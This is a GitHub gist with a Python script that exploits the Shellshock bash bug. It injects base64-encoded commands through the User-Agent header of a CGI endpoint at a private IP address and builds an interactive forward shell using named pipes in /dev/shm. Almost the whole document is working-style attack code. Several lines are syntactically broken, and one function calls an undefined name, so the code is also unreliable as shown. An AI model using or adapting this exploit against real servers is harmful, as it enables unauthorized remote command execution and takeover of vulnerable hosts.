Created
November 18, 2018 17:45
-
-
Save RomaniukVadim/5d9b10565a77b8a11f47b721a79083b6 to your computer and use it in GitHub Desktop.
Revisions
-
RomaniukVadim created this gist
Nov 18, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,65 @@ import requests import time from base64 import b64encode from random import randrange import threading class AllTheReads(object): def __init__(self, interval=1): self.interval = interval thread = threading.Thread(target=self.run, args=()) thread.daemon = True thread.start() def run(self): readoutput = """/bin/cat %s""" % (stdout) clearoutput = """echo '' > %s """ % (stdout) while True: output = RunCmd(readoutput) if output: RunCmd(clearoutput) time.sleep(self.interval) def RunCmd(cmd): cmd = cmd.encode('utf-8') cmd = b64encode(cmd).decode('utf-8') headers = { 'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" | base64 -d | sh'} % (cmd) } result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip() return result def WriteCmd(cmd): cmd = cmd.encode('utf-8') cmd = b64encode(cmd).decode('utf-8') headers = { 'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" | base64 -d > %s' (cmd, stdin) } result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip() return result def ReadCmd(cmd): output = """/bin/cat %s """ % (stdout) output = RunCmd(GetOutput) return output def SetupShell(): NamedPipes = """mkfifo %s; tail -f %s | /bin/sh 2>&1 %s """ (stdin, stdin, stdout) try: RunCmd(NamedPipes) except: None return None global stdin, stdout session = randrange(1000,9999) stdin = "/dev/shm/input.%s" % (session) stdout "/dev/shm/output.%s" % (session) clearoutput = """echo '' > %s """ % (stdout) SetupShell() ReadingTheThings = AllTheReads() while True: cmd = input("> ") WriteCmd(cmd + "\n") time.sleep(1.1)